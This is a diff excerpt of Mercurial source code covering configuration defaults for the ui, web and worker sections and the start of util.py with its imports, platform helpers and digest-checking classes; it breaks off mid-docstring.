1094 coreconfigitem('ui', 'remotecmd',
1097 coreconfigitem('ui', 'remotecmd',
1095 default='hg',
1098 default='hg',
1096 )
1099 )
1097 coreconfigitem('ui', 'report_untrusted',
1100 coreconfigitem('ui', 'report_untrusted',
1098 default=True,
1101 default=True,
1099 )
1102 )
1100 coreconfigitem('ui', 'rollback',
1103 coreconfigitem('ui', 'rollback',
1101 default=True,
1104 default=True,
1102 )
1105 )
1103 coreconfigitem('ui', 'slash',
1106 coreconfigitem('ui', 'slash',
1104 default=False,
1107 default=False,
1105 )
1108 )
1106 coreconfigitem('ui', 'ssh',
1109 coreconfigitem('ui', 'ssh',
1107 default='ssh',
1110 default='ssh',
1108 )
1111 )
1109 coreconfigitem('ui', 'ssherrorhint',
1112 coreconfigitem('ui', 'ssherrorhint',
1110 default=None,
1113 default=None,
1111 )
1114 )
1112 coreconfigitem('ui', 'statuscopies',
1115 coreconfigitem('ui', 'statuscopies',
1113 default=False,
1116 default=False,
1114 )
1117 )
1115 coreconfigitem('ui', 'strict',
1118 coreconfigitem('ui', 'strict',
1116 default=False,
1119 default=False,
1117 )
1120 )
1118 coreconfigitem('ui', 'style',
1121 coreconfigitem('ui', 'style',
1119 default='',
1122 default='',
1120 )
1123 )
1121 coreconfigitem('ui', 'supportcontact',
1124 coreconfigitem('ui', 'supportcontact',
1122 default=None,
1125 default=None,
1123 )
1126 )
1124 coreconfigitem('ui', 'textwidth',
1127 coreconfigitem('ui', 'textwidth',
1125 default=78,
1128 default=78,
1126 )
1129 )
1127 coreconfigitem('ui', 'timeout',
1130 coreconfigitem('ui', 'timeout',
1128 default='600',
1131 default='600',
1129 )
1132 )
1130 coreconfigitem('ui', 'timeout.warn',
1133 coreconfigitem('ui', 'timeout.warn',
1131 default=0,
1134 default=0,
1132 )
1135 )
1133 coreconfigitem('ui', 'traceback',
1136 coreconfigitem('ui', 'traceback',
1134 default=False,
1137 default=False,
1135 )
1138 )
1136 coreconfigitem('ui', 'tweakdefaults',
1139 coreconfigitem('ui', 'tweakdefaults',
1137 default=False,
1140 default=False,
1138 )
1141 )
1139 coreconfigitem('ui', 'username',
1142 coreconfigitem('ui', 'username',
1140 alias=[('ui', 'user')]
1143 alias=[('ui', 'user')]
1141 )
1144 )
1142 coreconfigitem('ui', 'verbose',
1145 coreconfigitem('ui', 'verbose',
1143 default=False,
1146 default=False,
1144 )
1147 )
1145 coreconfigitem('verify', 'skipflags',
1148 coreconfigitem('verify', 'skipflags',
1146 default=None,
1149 default=None,
1147 )
1150 )
1148 coreconfigitem('web', 'allowbz2',
1151 coreconfigitem('web', 'allowbz2',
1149 default=False,
1152 default=False,
1150 )
1153 )
1151 coreconfigitem('web', 'allowgz',
1154 coreconfigitem('web', 'allowgz',
1152 default=False,
1155 default=False,
1153 )
1156 )
1154 coreconfigitem('web', 'allow-pull',
1157 coreconfigitem('web', 'allow-pull',
1155 alias=[('web', 'allowpull')],
1158 alias=[('web', 'allowpull')],
1156 default=True,
1159 default=True,
1157 )
1160 )
1158 coreconfigitem('web', 'allow-push',
1161 coreconfigitem('web', 'allow-push',
1159 alias=[('web', 'allow_push')],
1162 alias=[('web', 'allow_push')],
1160 default=list,
1163 default=list,
1161 )
1164 )
1162 coreconfigitem('web', 'allowzip',
1165 coreconfigitem('web', 'allowzip',
1163 default=False,
1166 default=False,
1164 )
1167 )
1165 coreconfigitem('web', 'archivesubrepos',
1168 coreconfigitem('web', 'archivesubrepos',
1166 default=False,
1169 default=False,
1167 )
1170 )
1168 coreconfigitem('web', 'cache',
1171 coreconfigitem('web', 'cache',
1169 default=True,
1172 default=True,
1170 )
1173 )
1171 coreconfigitem('web', 'contact',
1174 coreconfigitem('web', 'contact',
1172 default=None,
1175 default=None,
1173 )
1176 )
1174 coreconfigitem('web', 'deny_push',
1177 coreconfigitem('web', 'deny_push',
1175 default=list,
1178 default=list,
1176 )
1179 )
1177 coreconfigitem('web', 'guessmime',
1180 coreconfigitem('web', 'guessmime',
1178 default=False,
1181 default=False,
1179 )
1182 )
1180 coreconfigitem('web', 'hidden',
1183 coreconfigitem('web', 'hidden',
1181 default=False,
1184 default=False,
1182 )
1185 )
1183 coreconfigitem('web', 'labels',
1186 coreconfigitem('web', 'labels',
1184 default=list,
1187 default=list,
1185 )
1188 )
1186 coreconfigitem('web', 'logoimg',
1189 coreconfigitem('web', 'logoimg',
1187 default='hglogo.png',
1190 default='hglogo.png',
1188 )
1191 )
1189 coreconfigitem('web', 'logourl',
1192 coreconfigitem('web', 'logourl',
1190 default='https://mercurial-scm.org/',
1193 default='https://mercurial-scm.org/',
1191 )
1194 )
1192 coreconfigitem('web', 'accesslog',
1195 coreconfigitem('web', 'accesslog',
1193 default='-',
1196 default='-',
1194 )
1197 )
1195 coreconfigitem('web', 'address',
1198 coreconfigitem('web', 'address',
1196 default='',
1199 default='',
1197 )
1200 )
1198 coreconfigitem('web', 'allow_archive',
1201 coreconfigitem('web', 'allow_archive',
1199 default=list,
1202 default=list,
1200 )
1203 )
1201 coreconfigitem('web', 'allow_read',
1204 coreconfigitem('web', 'allow_read',
1202 default=list,
1205 default=list,
1203 )
1206 )
1204 coreconfigitem('web', 'baseurl',
1207 coreconfigitem('web', 'baseurl',
1205 default=None,
1208 default=None,
1206 )
1209 )
1207 coreconfigitem('web', 'cacerts',
1210 coreconfigitem('web', 'cacerts',
1208 default=None,
1211 default=None,
1209 )
1212 )
1210 coreconfigitem('web', 'certificate',
1213 coreconfigitem('web', 'certificate',
1211 default=None,
1214 default=None,
1212 )
1215 )
1213 coreconfigitem('web', 'collapse',
1216 coreconfigitem('web', 'collapse',
1214 default=False,
1217 default=False,
1215 )
1218 )
1216 coreconfigitem('web', 'csp',
1219 coreconfigitem('web', 'csp',
1217 default=None,
1220 default=None,
1218 )
1221 )
1219 coreconfigitem('web', 'deny_read',
1222 coreconfigitem('web', 'deny_read',
1220 default=list,
1223 default=list,
1221 )
1224 )
1222 coreconfigitem('web', 'descend',
1225 coreconfigitem('web', 'descend',
1223 default=True,
1226 default=True,
1224 )
1227 )
1225 coreconfigitem('web', 'description',
1228 coreconfigitem('web', 'description',
1226 default="",
1229 default="",
1227 )
1230 )
1228 coreconfigitem('web', 'encoding',
1231 coreconfigitem('web', 'encoding',
1229 default=lambda: encoding.encoding,
1232 default=lambda: encoding.encoding,
1230 )
1233 )
1231 coreconfigitem('web', 'errorlog',
1234 coreconfigitem('web', 'errorlog',
1232 default='-',
1235 default='-',
1233 )
1236 )
1234 coreconfigitem('web', 'ipv6',
1237 coreconfigitem('web', 'ipv6',
1235 default=False,
1238 default=False,
1236 )
1239 )
1237 coreconfigitem('web', 'maxchanges',
1240 coreconfigitem('web', 'maxchanges',
1238 default=10,
1241 default=10,
1239 )
1242 )
1240 coreconfigitem('web', 'maxfiles',
1243 coreconfigitem('web', 'maxfiles',
1241 default=10,
1244 default=10,
1242 )
1245 )
1243 coreconfigitem('web', 'maxshortchanges',
1246 coreconfigitem('web', 'maxshortchanges',
1244 default=60,
1247 default=60,
1245 )
1248 )
1246 coreconfigitem('web', 'motd',
1249 coreconfigitem('web', 'motd',
1247 default='',
1250 default='',
1248 )
1251 )
1249 coreconfigitem('web', 'name',
1252 coreconfigitem('web', 'name',
1250 default=dynamicdefault,
1253 default=dynamicdefault,
1251 )
1254 )
1252 coreconfigitem('web', 'port',
1255 coreconfigitem('web', 'port',
1253 default=8000,
1256 default=8000,
1254 )
1257 )
1255 coreconfigitem('web', 'prefix',
1258 coreconfigitem('web', 'prefix',
1256 default='',
1259 default='',
1257 )
1260 )
1258 coreconfigitem('web', 'push_ssl',
1261 coreconfigitem('web', 'push_ssl',
1259 default=True,
1262 default=True,
1260 )
1263 )
1261 coreconfigitem('web', 'refreshinterval',
1264 coreconfigitem('web', 'refreshinterval',
1262 default=20,
1265 default=20,
1263 )
1266 )
1264 coreconfigitem('web', 'server-header',
1267 coreconfigitem('web', 'server-header',
1265 default=None,
1268 default=None,
1266 )
1269 )
1267 coreconfigitem('web', 'staticurl',
1270 coreconfigitem('web', 'staticurl',
1268 default=None,
1271 default=None,
1269 )
1272 )
1270 coreconfigitem('web', 'stripes',
1273 coreconfigitem('web', 'stripes',
1271 default=1,
1274 default=1,
1272 )
1275 )
1273 coreconfigitem('web', 'style',
1276 coreconfigitem('web', 'style',
1274 default='paper',
1277 default='paper',
1275 )
1278 )
1276 coreconfigitem('web', 'templates',
1279 coreconfigitem('web', 'templates',
1277 default=None,
1280 default=None,
1278 )
1281 )
1279 coreconfigitem('web', 'view',
1282 coreconfigitem('web', 'view',
1280 default='served',
1283 default='served',
1281 )
1284 )
1282 coreconfigitem('worker', 'backgroundclose',
1285 coreconfigitem('worker', 'backgroundclose',
1283 default=dynamicdefault,
1286 default=dynamicdefault,
1284 )
1287 )
1285 # Windows defaults to a limit of 512 open files. A buffer of 128
1288 # Windows defaults to a limit of 512 open files. A buffer of 128
1286 # should give us enough headway.
1289 # should give us enough headway.
1287 coreconfigitem('worker', 'backgroundclosemaxqueue',
1290 coreconfigitem('worker', 'backgroundclosemaxqueue',
1288 default=384,
1291 default=384,
1289 )
1292 )
1290 coreconfigitem('worker', 'backgroundcloseminfilecount',
1293 coreconfigitem('worker', 'backgroundcloseminfilecount',
1291 default=2048,
1294 default=2048,
1292 )
1295 )
1293 coreconfigitem('worker', 'backgroundclosethreadcount',
1296 coreconfigitem('worker', 'backgroundclosethreadcount',
1294 default=4,
1297 default=4,
1295 )
1298 )
1296 coreconfigitem('worker', 'enabled',
1299 coreconfigitem('worker', 'enabled',
1297 default=True,
1300 default=True,
1298 )
1301 )
1299 coreconfigitem('worker', 'numcpus',
1302 coreconfigitem('worker', 'numcpus',
1300 default=None,
1303 default=None,
1301 )
1304 )
1302
1305
1303 # Rebase related configuration moved to core because other extension are doing
1306 # Rebase related configuration moved to core because other extension are doing
1304 # strange things. For example, shelve import the extensions to reuse some bit
1307 # strange things. For example, shelve import the extensions to reuse some bit
1305 # without formally loading it.
1308 # without formally loading it.
1306 coreconfigitem('commands', 'rebase.requiredest',
1309 coreconfigitem('commands', 'rebase.requiredest',
1307 default=False,
1310 default=False,
1308 )
1311 )
1309 coreconfigitem('experimental', 'rebaseskipobsolete',
1312 coreconfigitem('experimental', 'rebaseskipobsolete',
1310 default=True,
1313 default=True,
1311 )
1314 )
1312 coreconfigitem('rebase', 'singletransaction',
1315 coreconfigitem('rebase', 'singletransaction',
1313 default=False,
1316 default=False,
1314 )
1317 )
1315 coreconfigitem('rebase', 'experimental.inmemory',
1318 coreconfigitem('rebase', 'experimental.inmemory',
1316 default=False,
1319 default=False,
1317 )
1320 )
@@ -1,4365 +1,4373 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import io
27 import io
28 import itertools
28 import itertools
29 import mmap
29 import mmap
30 import os
30 import os
31 import platform as pyplatform
31 import platform as pyplatform
32 import re as remod
32 import re as remod
33 import shutil
33 import shutil
34 import signal
34 import signal
35 import socket
35 import socket
36 import stat
36 import stat
37 import string
37 import string
38 import subprocess
38 import subprocess
39 import sys
39 import sys
40 import tempfile
40 import tempfile
41 import textwrap
41 import textwrap
42 import time
42 import time
43 import traceback
43 import traceback
44 import warnings
44 import warnings
45 import zlib
45 import zlib
46
46
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 node as nodemod,
51 node as nodemod,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56 from .utils import dateutil
56 from .utils import dateutil
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 bytesio = pycompat.bytesio
74 bytesio = pycompat.bytesio
75 # TODO deprecate stringio name, as it is a lie on Python 3.
75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 stringio = bytesio
76 stringio = bytesio
77 xmlrpclib = pycompat.xmlrpclib
77 xmlrpclib = pycompat.xmlrpclib
78
78
79 httpserver = urllibcompat.httpserver
79 httpserver = urllibcompat.httpserver
80 urlerr = urllibcompat.urlerr
80 urlerr = urllibcompat.urlerr
81 urlreq = urllibcompat.urlreq
81 urlreq = urllibcompat.urlreq
82
82
83 # workaround for win32mbcs
83 # workaround for win32mbcs
84 _filenamebytestr = pycompat.bytestr
84 _filenamebytestr = pycompat.bytestr
85
85
86 def isatty(fp):
86 def isatty(fp):
87 try:
87 try:
88 return fp.isatty()
88 return fp.isatty()
89 except AttributeError:
89 except AttributeError:
90 return False
90 return False
91
91
92 # glibc determines buffering on first write to stdout - if we replace a TTY
92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 # buffering
94 # buffering
95 if isatty(stdout):
95 if isatty(stdout):
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97
97
98 if pycompat.iswindows:
98 if pycompat.iswindows:
99 from . import windows as platform
99 from . import windows as platform
100 stdout = platform.winstdout(stdout)
100 stdout = platform.winstdout(stdout)
101 else:
101 else:
102 from . import posix as platform
102 from . import posix as platform
103
103
104 _ = i18n._
104 _ = i18n._
105
105
106 bindunixsocket = platform.bindunixsocket
106 bindunixsocket = platform.bindunixsocket
107 cachestat = platform.cachestat
107 cachestat = platform.cachestat
108 checkexec = platform.checkexec
108 checkexec = platform.checkexec
109 checklink = platform.checklink
109 checklink = platform.checklink
110 copymode = platform.copymode
110 copymode = platform.copymode
111 executablepath = platform.executablepath
111 executablepath = platform.executablepath
112 expandglobs = platform.expandglobs
112 expandglobs = platform.expandglobs
113 explainexit = platform.explainexit
113 explainexit = platform.explainexit
114 findexe = platform.findexe
114 findexe = platform.findexe
115 getfsmountpoint = platform.getfsmountpoint
115 getfsmountpoint = platform.getfsmountpoint
116 getfstype = platform.getfstype
116 getfstype = platform.getfstype
117 gethgcmd = platform.gethgcmd
117 gethgcmd = platform.gethgcmd
118 getuser = platform.getuser
118 getuser = platform.getuser
119 getpid = os.getpid
119 getpid = os.getpid
120 groupmembers = platform.groupmembers
120 groupmembers = platform.groupmembers
121 groupname = platform.groupname
121 groupname = platform.groupname
122 hidewindow = platform.hidewindow
122 hidewindow = platform.hidewindow
123 isexec = platform.isexec
123 isexec = platform.isexec
124 isowner = platform.isowner
124 isowner = platform.isowner
125 listdir = osutil.listdir
125 listdir = osutil.listdir
126 localpath = platform.localpath
126 localpath = platform.localpath
127 lookupreg = platform.lookupreg
127 lookupreg = platform.lookupreg
128 makedir = platform.makedir
128 makedir = platform.makedir
129 nlinks = platform.nlinks
129 nlinks = platform.nlinks
130 normpath = platform.normpath
130 normpath = platform.normpath
131 normcase = platform.normcase
131 normcase = platform.normcase
132 normcasespec = platform.normcasespec
132 normcasespec = platform.normcasespec
133 normcasefallback = platform.normcasefallback
133 normcasefallback = platform.normcasefallback
134 openhardlinks = platform.openhardlinks
134 openhardlinks = platform.openhardlinks
135 oslink = platform.oslink
135 oslink = platform.oslink
136 parsepatchoutput = platform.parsepatchoutput
136 parsepatchoutput = platform.parsepatchoutput
137 pconvert = platform.pconvert
137 pconvert = platform.pconvert
138 poll = platform.poll
138 poll = platform.poll
139 popen = platform.popen
139 popen = platform.popen
140 posixfile = platform.posixfile
140 posixfile = platform.posixfile
141 quotecommand = platform.quotecommand
141 quotecommand = platform.quotecommand
142 readpipe = platform.readpipe
142 readpipe = platform.readpipe
143 rename = platform.rename
143 rename = platform.rename
144 removedirs = platform.removedirs
144 removedirs = platform.removedirs
145 samedevice = platform.samedevice
145 samedevice = platform.samedevice
146 samefile = platform.samefile
146 samefile = platform.samefile
147 samestat = platform.samestat
147 samestat = platform.samestat
148 setbinary = platform.setbinary
148 setbinary = platform.setbinary
149 setflags = platform.setflags
149 setflags = platform.setflags
150 setsignalhandler = platform.setsignalhandler
150 setsignalhandler = platform.setsignalhandler
151 shellquote = platform.shellquote
151 shellquote = platform.shellquote
152 shellsplit = platform.shellsplit
152 shellsplit = platform.shellsplit
153 spawndetached = platform.spawndetached
153 spawndetached = platform.spawndetached
154 split = platform.split
154 split = platform.split
155 sshargs = platform.sshargs
155 sshargs = platform.sshargs
156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
157 statisexec = platform.statisexec
157 statisexec = platform.statisexec
158 statislink = platform.statislink
158 statislink = platform.statislink
159 testpid = platform.testpid
159 testpid = platform.testpid
160 umask = platform.umask
160 umask = platform.umask
161 unlink = platform.unlink
161 unlink = platform.unlink
162 username = platform.username
162 username = platform.username
163
163
164 try:
164 try:
165 recvfds = osutil.recvfds
165 recvfds = osutil.recvfds
166 except AttributeError:
166 except AttributeError:
167 pass
167 pass
168 try:
168 try:
169 setprocname = osutil.setprocname
169 setprocname = osutil.setprocname
170 except AttributeError:
170 except AttributeError:
171 pass
171 pass
172 try:
172 try:
173 unblocksignal = osutil.unblocksignal
173 unblocksignal = osutil.unblocksignal
174 except AttributeError:
174 except AttributeError:
175 pass
175 pass
176
176
177 # Python compatibility
177 # Python compatibility
178
178
179 _notset = object()
179 _notset = object()
180
180
181 def safehasattr(thing, attr):
181 def safehasattr(thing, attr):
182 return getattr(thing, attr, _notset) is not _notset
182 return getattr(thing, attr, _notset) is not _notset
183
183
184 def _rapply(f, xs):
184 def _rapply(f, xs):
185 if xs is None:
185 if xs is None:
186 # assume None means non-value of optional data
186 # assume None means non-value of optional data
187 return xs
187 return xs
188 if isinstance(xs, (list, set, tuple)):
188 if isinstance(xs, (list, set, tuple)):
189 return type(xs)(_rapply(f, x) for x in xs)
189 return type(xs)(_rapply(f, x) for x in xs)
190 if isinstance(xs, dict):
190 if isinstance(xs, dict):
191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 return f(xs)
192 return f(xs)
193
193
194 def rapply(f, xs):
194 def rapply(f, xs):
195 """Apply function recursively to every item preserving the data structure
195 """Apply function recursively to every item preserving the data structure
196
196
197 >>> def f(x):
197 >>> def f(x):
198 ... return 'f(%s)' % x
198 ... return 'f(%s)' % x
199 >>> rapply(f, None) is None
199 >>> rapply(f, None) is None
200 True
200 True
201 >>> rapply(f, 'a')
201 >>> rapply(f, 'a')
202 'f(a)'
202 'f(a)'
203 >>> rapply(f, {'a'}) == {'f(a)'}
203 >>> rapply(f, {'a'}) == {'f(a)'}
204 True
204 True
205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
207
207
208 >>> xs = [object()]
208 >>> xs = [object()]
209 >>> rapply(pycompat.identity, xs) is xs
209 >>> rapply(pycompat.identity, xs) is xs
210 True
210 True
211 """
211 """
212 if f is pycompat.identity:
212 if f is pycompat.identity:
213 # fast path mainly for py2
213 # fast path mainly for py2
214 return xs
214 return xs
215 return _rapply(f, xs)
215 return _rapply(f, xs)
216
216
217 def bitsfrom(container):
217 def bitsfrom(container):
218 bits = 0
218 bits = 0
219 for bit in container:
219 for bit in container:
220 bits |= bit
220 bits |= bit
221 return bits
221 return bits
222
222
223 # python 2.6 still have deprecation warning enabled by default. We do not want
223 # python 2.6 still have deprecation warning enabled by default. We do not want
224 # to display anything to standard user so detect if we are running test and
224 # to display anything to standard user so detect if we are running test and
225 # only use python deprecation warning in this case.
225 # only use python deprecation warning in this case.
226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
227 if _dowarn:
227 if _dowarn:
228 # explicitly unfilter our warning for python 2.7
228 # explicitly unfilter our warning for python 2.7
229 #
229 #
230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
231 # However, module name set through PYTHONWARNINGS was exactly matched, so
231 # However, module name set through PYTHONWARNINGS was exactly matched, so
232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
237 if _dowarn and pycompat.ispy3:
237 if _dowarn and pycompat.ispy3:
238 # silence warning emitted by passing user string to re.sub()
238 # silence warning emitted by passing user string to re.sub()
239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
240 r'mercurial')
240 r'mercurial')
241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
242 DeprecationWarning, r'mercurial')
242 DeprecationWarning, r'mercurial')
243
243
244 def nouideprecwarn(msg, version, stacklevel=1):
244 def nouideprecwarn(msg, version, stacklevel=1):
245 """Issue an python native deprecation warning
245 """Issue an python native deprecation warning
246
246
247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
248 """
248 """
249 if _dowarn:
249 if _dowarn:
250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
251 " update your code.)") % version
251 " update your code.)") % version
252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253
253
254 DIGESTS = {
254 DIGESTS = {
255 'md5': hashlib.md5,
255 'md5': hashlib.md5,
256 'sha1': hashlib.sha1,
256 'sha1': hashlib.sha1,
257 'sha512': hashlib.sha512,
257 'sha512': hashlib.sha512,
258 }
258 }
259 # List of digest types from strongest to weakest
259 # List of digest types from strongest to weakest
260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
261
261
262 for k in DIGESTS_BY_STRENGTH:
262 for k in DIGESTS_BY_STRENGTH:
263 assert k in DIGESTS
263 assert k in DIGESTS
264
264
265 class digester(object):
265 class digester(object):
266 """helper to compute digests.
266 """helper to compute digests.
267
267
268 This helper can be used to compute one or more digests given their name.
268 This helper can be used to compute one or more digests given their name.
269
269
270 >>> d = digester([b'md5', b'sha1'])
270 >>> d = digester([b'md5', b'sha1'])
271 >>> d.update(b'foo')
271 >>> d.update(b'foo')
272 >>> [k for k in sorted(d)]
272 >>> [k for k in sorted(d)]
273 ['md5', 'sha1']
273 ['md5', 'sha1']
274 >>> d[b'md5']
274 >>> d[b'md5']
275 'acbd18db4cc2f85cedef654fccc4a4d8'
275 'acbd18db4cc2f85cedef654fccc4a4d8'
276 >>> d[b'sha1']
276 >>> d[b'sha1']
277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
278 >>> digester.preferred([b'md5', b'sha1'])
278 >>> digester.preferred([b'md5', b'sha1'])
279 'sha1'
279 'sha1'
280 """
280 """
281
281
282 def __init__(self, digests, s=''):
282 def __init__(self, digests, s=''):
283 self._hashes = {}
283 self._hashes = {}
284 for k in digests:
284 for k in digests:
285 if k not in DIGESTS:
285 if k not in DIGESTS:
286 raise Abort(_('unknown digest type: %s') % k)
286 raise Abort(_('unknown digest type: %s') % k)
287 self._hashes[k] = DIGESTS[k]()
287 self._hashes[k] = DIGESTS[k]()
288 if s:
288 if s:
289 self.update(s)
289 self.update(s)
290
290
291 def update(self, data):
291 def update(self, data):
292 for h in self._hashes.values():
292 for h in self._hashes.values():
293 h.update(data)
293 h.update(data)
294
294
295 def __getitem__(self, key):
295 def __getitem__(self, key):
296 if key not in DIGESTS:
296 if key not in DIGESTS:
297 raise Abort(_('unknown digest type: %s') % k)
297 raise Abort(_('unknown digest type: %s') % k)
298 return nodemod.hex(self._hashes[key].digest())
298 return nodemod.hex(self._hashes[key].digest())
299
299
300 def __iter__(self):
300 def __iter__(self):
301 return iter(self._hashes)
301 return iter(self._hashes)
302
302
303 @staticmethod
303 @staticmethod
304 def preferred(supported):
304 def preferred(supported):
305 """returns the strongest digest type in both supported and DIGESTS."""
305 """returns the strongest digest type in both supported and DIGESTS."""
306
306
307 for k in DIGESTS_BY_STRENGTH:
307 for k in DIGESTS_BY_STRENGTH:
308 if k in supported:
308 if k in supported:
309 return k
309 return k
310 return None
310 return None
311
311
312 class digestchecker(object):
312 class digestchecker(object):
313 """file handle wrapper that additionally checks content against a given
313 """file handle wrapper that additionally checks content against a given
314 size and digests.
314 size and digests.
315
315
316 d = digestchecker(fh, size, {'md5': '...'})
316 d = digestchecker(fh, size, {'md5': '...'})
317
317
318 When multiple digests are given, all of them are validated.
318 When multiple digests are given, all of them are validated.
319 """
319 """
320
320
321 def __init__(self, fh, size, digests):
321 def __init__(self, fh, size, digests):
322 self._fh = fh
322 self._fh = fh
323 self._size = size
323 self._size = size
324 self._got = 0
324 self._got = 0
325 self._digests = dict(digests)
325 self._digests = dict(digests)
326 self._digester = digester(self._digests.keys())
326 self._digester = digester(self._digests.keys())
327
327
328 def read(self, length=-1):
328 def read(self, length=-1):
329 content = self._fh.read(length)
329 content = self._fh.read(length)
330 self._digester.update(content)
330 self._digester.update(content)
331 self._got += len(content)
331 self._got += len(content)
332 return content
332 return content
333
333
334 def validate(self):
334 def validate(self):
335 if self._size != self._got:
335 if self._size != self._got:
336 raise Abort(_('size mismatch: expected %d, got %d') %
336 raise Abort(_('size mismatch: expected %d, got %d') %
337 (self._size, self._got))
337 (self._size, self._got))
338 for k, v in self._digests.items():
338 for k, v in self._digests.items():
339 if v != self._digester[k]:
339 if v != self._digester[k]:
340 # i18n: first parameter is a digest name
340 # i18n: first parameter is a digest name
341 raise Abort(_('%s mismatch: expected %s, got %s') %
341 raise Abort(_('%s mismatch: expected %s, got %s') %
342 (k, v, self._digester[k]))
342 (k, v, self._digester[k]))
343
343
344 try:
344 try:
345 buffer = buffer
345 buffer = buffer
346 except NameError:
346 except NameError:
347 def buffer(sliceable, offset=0, length=None):
347 def buffer(sliceable, offset=0, length=None):
348 if length is not None:
348 if length is not None:
349 return memoryview(sliceable)[offset:offset + length]
349 return memoryview(sliceable)[offset:offset + length]
350 return memoryview(sliceable)[offset:]
350 return memoryview(sliceable)[offset:]
351
351
352 closefds = pycompat.isposix
352 closefds = pycompat.isposix
353
353
354 _chunksize = 4096
354 _chunksize = 4096
355
355
356 class bufferedinputpipe(object):
356 class bufferedinputpipe(object):
357 """a manually buffered input pipe
357 """a manually buffered input pipe
358
358
359 Python will not let us use buffered IO and lazy reading with 'polling' at
359 Python will not let us use buffered IO and lazy reading with 'polling' at
360 the same time. We cannot probe the buffer state and select will not detect
360 the same time. We cannot probe the buffer state and select will not detect
361 that data are ready to read if they are already buffered.
361 that data are ready to read if they are already buffered.
362
362
363 This class let us work around that by implementing its own buffering
363 This class let us work around that by implementing its own buffering
364 (allowing efficient readline) while offering a way to know if the buffer is
